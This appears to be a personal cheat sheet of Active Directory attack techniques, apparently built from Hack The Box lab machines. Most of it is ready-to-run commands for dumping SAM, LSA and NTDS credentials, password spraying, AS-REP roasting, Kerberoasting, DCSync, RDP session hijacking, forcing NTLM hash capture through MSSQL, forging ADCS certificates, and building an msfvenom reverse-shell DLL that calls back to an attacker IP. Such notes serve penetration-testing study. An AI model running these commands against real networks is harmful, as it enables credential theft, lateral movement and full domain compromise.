Active Directory Tools & attacks
This document is a work-in-progress where I’m compiling a variety of techniques for enumerating and exploiting Active Directory environments. It will be updated over time with additional steps and insights as I continue to explore and refine the methodology
ENUMERATION TECHNICS
ENUMERATING SMB
SMB (Server Message Block) is a network file sharing protocol used in Windows environments that allows applications to read and write to files, request services from server programs, and communicate with other devices on a network. It’s commonly used for sharing files and printers between computers within a local network.
Crackmapexec for smb
CrackMapExec (CME) for SMB is a tool used by penetration testers to automate post-exploitation tasks on Windows networks via the SMB protocol. It allows users to quickly enumerate SMB shares, perform lateral movement, dump hashes, execute remote commands, and check SMB authentication across multiple systems. CME is commonly used for internal network exploitation and vulnerability assessment in Windows environments.
1
2
3
4
5
6
crackmapexec smb 10.10.10.175 -u '' -p '' # Authenticate as anonymous
crackmapexec smb 10.10.10.175 -u 'guest' -p 'guest' # Authenticate as guest
crackmapexec smb 10.10.10.175 -u 'valid_creds' -p 'valid_creds' # Authenticate with valid credentials
crackmapexec smb 10.10.10.177 -u <username> -p <password> --exec -c "<command>" # Execute commands
crackmapexec smb 10.129.202.137 --local-auth -u whare -p password! --lsa # dumping lsa if we have permission
crackmapexec smb 10.129.202.137 --local-auth -u whare -p password! --sam #dumping sam if we have permission
Smbclient
Smbclient is a command-line tool used to access and interact with shared files and printers over the SMB/CIFS protocol. It is commonly used in Linux and Unix-based systems to connect to Windows-based file shares.
1
2
3
4
5
6
7
8
9
smbclient //10.10.10.182/Data -U r.thompson # Connect to a specific share
smbclient -L <hostname> -U <username> # List shared resources on a server
smbclient //<hostname>/<share> -U <username> -c 'put <localfile> <remotefile>' # Upload an archive
smbclient //<hostname>/<share> -U <username> -c 'get <remotefile> <localfile>' # Download a file from the server
smbclient //10.10.10.182/Audit$ -U s.smith # With the follows commands you can dump all the avalibles files on a shared resource
smb: \> mask ""
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *
Smbmap
1
smbmap -H 10.10.10.192 -u audit2020 -p 'wharep@ssword2025'
ENUMERATING RPC
RPC is a protocol used by programs to request services or perform tasks on a remote server or computer. It allows a program to execute code on another machine as if it were local, facilitating distributed computing. It’s widely used for client-server communication and allows seamless interaction between systems over a network.
Rpcclient
Rpcclient is a command-line tool used to interact with the Remote Procedure Call (RPC) service on Windows machines, typically via SMB. It allows users to perform various tasks such as enumerating users, groups, shares, and more, by sending requests to the Windows RPC server.
1
2
3
4
5
rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
rpcclient $> querydispinfo
# After dumping all the names we can use the following command to apply the correct format
grep -oP '(?<=user:\[)[^\]]+' raw_names.txt > users.txt
ENUMERATING LDAP
LDAP (Lightweight Directory Access Protocol) is a protocol used to access and manage directory services over a network. It is commonly used for querying and modifying data in directory services such as Microsoft Active Directory (AD) or OpenLDAP.
Ldapsearch
Ldapsearch is a command-line tool used to query and search data from an LDAP (Lightweight Directory Access Protocol) server, such as Active Directory or OpenLDAP. It allows you to search for specific objects (like users, groups, or computers) in the directory and retrieve their attributes. There’s a cheatsheet for applying dierents filters
1
2
3
ldapsearch -x -H ldap://10.10.10.182 -s base -b "" namingcontexts # Get names context over the domain
ldapsearch -x -H ldap://10.10.10.182 -b 'DC=cascade,DC=local' -s sub > ldap_dump.txt # Dump all the information
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" "(objectClass=person)" > dumping_users.txt # Applying filter for the dump
Crackmapexec for ldap
CrackMapExec (CME) also supports LDAP (Lightweight Directory Access Protocol), which allows you to interact with and enumerate data in directory services like Active Directory. With CME, you can query and interact with LDAP servers, perform user enumeration, and execute commands on the directory server.
1
2
3
crackmapexec ldap <hostname> -u <username> -p <password> --users # Enumerate users and groups
crackmapexec ldap <hostname> -u <username> -p <password> --domains # Enumerate domains
crackmapexec ldap <hostname> -u <username> -p <password> --search '(&(objectClass=user)(sAMAccountName=*administrator*))' # Enumerate specific atr
Netexec for ldap
Netexec is a post-exploitation tool used to execute commands on remote machines via various network protocols, such as SMB, LDAP, and ADCS. It allows attackers to interact with Active Directory and related services, automate tasks, and perform enumeration or exploitation of vulnerable configurations in the network.
1
2
3
4
netexec ldap <target-ip> -u <user> -p <password> --module enumdc # Enumerate Domain Controllers
netexec ldap <target-ip> -u <user> -p <password> --module user-desc # Search for users
netexec ldap <target-ip> -u <user> -p <password> --module adcs # Check for misconfigurations in ADCS
netexec ldap <target-ip> -u <user> -p <password> --module ldap-checker # Search for bindings
Netexec for smb
1
2
3
4
5
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --ntds # Capturing ntds.ditt
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --lsa # dumping lsa
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' --sam # dumping sam
netexec smb 10.129.202.85 -u whare -p 's3cur3p@ssw0rd!' -X 'whoami -all' # execute powershell commands
netexec smb 10.129.43.219 -u names.list -p pws.list --local-auth # for bureforce a local acc
Netexec for winrm
1
netexec winrm 10.129.202.85 -u names_list.txt -p password_list.txt
ENUMERATING RDP
Metasploit for rdp
1
2
3
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <rango_de_ips>
run
Hijack RDP sesssion & disable restricted admin mode
1
2
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0
ENUMERATING TLS
TLS encrypts communication between the client and server, ensuring security. It runs on port 3269 for secure Active Directory Global Catalog queries. Enumerating it is important because it may reveal valuable information about the domain, certificates, and potential attack vectors, all while being encrypted for protection.
1
openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text
ENUMERATING MSSQL
MSSQL (Microsoft SQL Server):** MSSQL is a relational database management system (RDBMS) developed by Microsoft. It is widely used in enterprise environments to store and manage large amounts of data, supporting complex queries, transactions, and data integrity.
Impacket-mssqclient
Impacket-mssqlclient is a tool from the Impacket suite, which provides scripts and utilities to interact with various network protocols in Windows environments. mssqlclient allows us to connect to an MSSQL server using the obtained credentials, enabling actions like executing SQL queries, exploiting SQL injection vulnerabilities, or accessing sensitive data stored in the database.
1
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
VULNERABILITIES
Password sprying
Password spraying is a brute-force attack method where an attacker attempts to log in to multiple accounts using the same common password (e.g., “Welcome123!”). Unlike traditional brute force, which targets one account with many passwords, password spraying avoids account lockouts by testing a single password across many different accounts.
1
2
3
4
crackmapexec smb 10.10.10.169 -u users.txt -p password.txt --continue-on-success
netexec ldap <target-ip> -u users.txt -p password.txt --continue-on-succes
netexec smb <target-ip> -u users.txt -p password.txt --continue-on-succes
netexec winrm <target-ip> -u users.txt -p password.txt --continue-on-succes
Kerberos pre-authentication vulnerability
Username-anarchy
Username-anarchy is a tool commonly used in Active Directory enumeration during security assessments. It is designed to find usernames based on common naming conventions used within organizations. The tool tries to identify likely usernames by leveraging patterns such as the combination of first names, last names, initials, and common organizational naming formats.
1
./username-anarchy --input-file /home/whare/hackthebox/maquinas/saune/users.txt --select-format first,flast,first.last,firstl > test_users.txt
AS-REP attack
An AS-REP attack exploits the Kerberos authentication protocol in Active Directory environments, targeting user accounts without pre-existing passwords or non-Microsoft accounts. When these accounts attempt to authenticate, they send an AS-REP (Authentication Service Response) to the domain controller, which is encrypted. This response can be intercepted and cracked offline to reveal the user’s password, making this attack particularly effective against accounts without strong protections in place.
Target: User accounts, especially those without passwords or those using non-Microsoft identities.
1
2
3
4
impacket-GetNPUsers.py is an Impacket script used for AS-REP Roasting attacks in Active Directory. It retrieves users with Kerberos pre-authentication disabled, allowing attackers to capture and crack password hashes offline.
# COMANDS
impacket-GetNPUsers.py -no-pass -usersfile test_users.txt EGOTISTICAL-BANK.local/
impacket-GetNPUsers.py -usersfile users.txt -domain DOMAIN.local -no-pass
1
2
3
4
`Kerbrute` is a tool for performing brute-force attacks against Kerberos authentication. It can be used to enumerate valid usernames and perform AS-REP Roasting attacks to obtain password hashes from users with Kerberos pre-authentication disabled.
# COMANDS
kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL usernames.txt
kerbrute userenum -d DOMAIN -i users.txt
Kerberoasting
Kerberoasting targets service accounts in Active Directory environments. In this attack, an attacker requests Service Tickets (TGS) for service accounts with a registered Service Principal Name (SPN). These tickets are encrypted with the service account’s password hash, and once obtained, they can be cracked offline to reveal the plaintext password of the service account. This provides attackers with access to services and potential privilege escalation.
Target: Service accounts, which typically have weak or predictable passwords.
1
impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
DC-SYNC
A DCSync attack is a method used to simulate the behavior of a Domain Controller (DC) in order to retrieve password hashes of domain accounts from Active Directory. This attack exploits the replication protocol used by domain controllers to synchronize directory data. By performing a DCSync attack, an attacker can request the password hashes (or even clear-text passwords, if applicable) for specific accounts without needing direct access to the DC.
You will need one of the following requirements, usually printed on BLOODHOUND:
- DS-REPLICATION-GET-CHANGES: Allows obtaining information about changes in the directory.
- DS-REPLICATION-GET-CHANGES-ALL: Allows obtaining all replication changes, including encrypted passwords.
- Elevated Permissions: Members of Domain Admins or Enterprise Admins typically have these permissions.
1
./secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 # Dump credentials (if we have acces to them)
Man in the middle
A Man-in-the-Middle (MITM) attack in the context of Active Directory (AD) involves intercepting and potentially altering communication between a client (e.g., a user or service) and a domain controller (DC). This can occur when an attacker is positioned between the client and DC, allowing them to capture authentication traffic, modify requests, or inject malicious data
MITM with mssql
Once we re inside the MSSQL we can try to force a conexion with our smbserver to try catching its hash NTLMv2
1
2
impacket-smbserver share /tmp/share -ip 10.10.14.9 -smb2support # Create your smbserver
EXEC xp_dirtree '\\10.10.14.9\share', 1, 1 # Make the msql connect to the smbserver
Active Directory Certificate Services (ADCS)
This vulnerability arises when the Active Directory Certificate Services (ADCS) are improperly configured. In such cases, attackers can potentially request and obtain certificates from the enterprise CA without proper authorization. These misconfigurations can allow an attacker to enroll for certificates that grant elevated privileges or enable impersonation of legitimate users. By exploiting this weakness, an attacker could escalate privileges or move laterally within the network.
Certify.exe
With Certify.exe, we can test if the victim machine’s ADCS setup is susceptible to unauthorized certificate enrollment and assess the associated risks
1
2
.\Certify.exe find /vulnerable /currentuser # Confirm if its vulnerable
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator # Make a fake certificate
Rubeus.exe
Rubeus.exe a powerful tool for interacting with Kerberos tickets in Windows environments. In this context, we will use it to request a Ticket Granting Ticket (TGT) using the certificate we obtained and in this case we also get the hash NTLM.
1
.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap
ABUSE OF PRIVILEGES
Enumerating privileges
Common commnds
1
2
whoami -all
whoami -groups
Bloodhound for enumerating privileges
BloodHound is a tool for Active Directory auditing that helps map trust relationships, permissions, and privilege escalation paths within a domain. It visually identifies attack vectors by showing how an attacker could escalate privileges or move laterally within a network.
If we cant acces with WinRM:
1
bloodhound-python -c All -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -ns 10.10.11.45
If we can acces with WinRM: SharpHound >
SharpHound for enumerating privileges
SharpHound is the data collection tool used by BloodHound. It scans the Active Directory environment to gather information about users, groups, permissions, and trust relationships. The data collected is then analyzed by BloodHound.
Why we use SharpHound:
We use SharpHound because it performs a more thorough scan of the domain from within the network. It reveals detailed relationships and permissions that may not be accessible remotely, providing critical information for privilege escalation.
DISCLAIMER: If you are using BloodHound installed from Kali’s APT repository, you will need to run SharpHound v1.1.0. Otherwise, your data will not load properly.
Privileged AD Group Abuse
AD-Recycle Bin
The AD Recycle Bin is a feature in Active Directory that allows the recovery of deleted objects, such as users, groups, or computers, without requiring backups. Being part of this group, we can potentially enumerate and extract information from deleted objects in the domain.
1
2
3
4
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects # Filter for deleted objects
Get-ADObject -Filter 'SAMAccountName -eq "User"' -IncludeDeletedObjects -Properties * # Filter for users
Get-ADObject -ldapfilter "(&(ObjectClass=user)(DisplayName=TempAdmin)(isDeleted=TRUE))" -IncludeDeletedObjects -Properties *
Restore-ADObject -Identity <ObjectGUID> # Restore objects
Dns-Admins
DnsAdmins group consists of users who have special permissions to manage and configure DNS settings on a Windows machine. Members of this group typically have the ability to create, modify, and delete DNS records in Active Directory-integrated zones. By default, this group does not have permission to start or stop the DNS service, but administrators can assign additional privileges to members, which may include the ability to control the DNS service.
We create our malicious plugin using msfvenom
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o whare.dll
Next steps explianed on resolute writeup
LAPS_Readers
LAPS_Readers is a built-in group in Active Directory, specifically for Local Administrator Password Solution (LAPS). Members of this group have read-only access to the local administrator passwords of managed machines in the domain. These passwords are automatically generated and stored securely in Active Directory by LAPS.
In short, LAPS_Readers allows members to view the local administrator passwords, but not to modify or manage them.
1
2
Get-ADComputer -Filter * | Select-Object Name
Get-ADComputer -Identity "DC01" -Properties ms-Mcs-AdmPwd
Backup Operators
The Backup Operators group is a built-in group in Windows that grants its members the ability to back up and restore files on the system, even if they do not have direct access to those files. Members of this group have elevated privileges, but they are often overlooked when it comes to privilege escalation, as they can access sensitive files such as the NTDS.dit file, which contains the Active Directory database, including user credentials and hashes.
Our goal is to leverage our membership in the Backup Operators group to try to copy the NTDS.dit file. Once we have a copy of the file, we can extract and crack the hashes stored inside it to potentially gain access to other user accounts or escalate our privileges further.
Guide step by step here
